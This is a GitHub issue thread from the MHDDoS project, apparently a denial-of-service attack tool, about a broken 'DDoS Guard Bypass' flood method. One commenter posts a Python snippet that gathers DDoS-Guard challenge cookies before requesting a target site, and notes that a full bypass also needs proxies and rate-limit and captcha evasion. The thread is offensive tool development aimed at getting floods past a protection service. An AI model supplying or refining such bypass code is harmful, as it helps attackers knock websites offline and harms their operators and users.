### ISSUE TITLE
DGB (DDoS Guard Bypass) is 1) not enabled 2) not working

### ISSUE THREAD

**Issue by porthole-ascend-cinnamon** [MHProDev/MHDDoS#231]
Setting method as DGB in reality uses GET method (there is no `if` clause in `HttpFlood.select`).
Additionally, it's implementation uses Cloudflare scraper, which does nothing to bypass DDoS-Guard, basically acting as a plain `Session`.

**Comment by andress134** [comment]
@MHProDev  try add something like

```python
import requests

session = requests.Session()


def ddg_solver():
    response = session.post("https://check.ddos-guard.net/check.js")
    response.raise_for_status()
    for key, value in session.cookies.items():
        session.cookies.set_cookie(requests.cookies.create_cookie(key, value))


if __name__ == '__main__':
    ddg_solver()
    test = session.get("https://target.com").text
    print(test)```

**Comment by porthole-ascend-cinnamon** [comment]
@andress134 that doesn't seem to work for me

**Comment by andress134** [comment]
> @andress134 that doesn't seem to work for me

Work for v1 challenge
but ddg need ratelimit and captcha bypass (if the proxies are shit or waf detect alot req from same ip you get captcha)
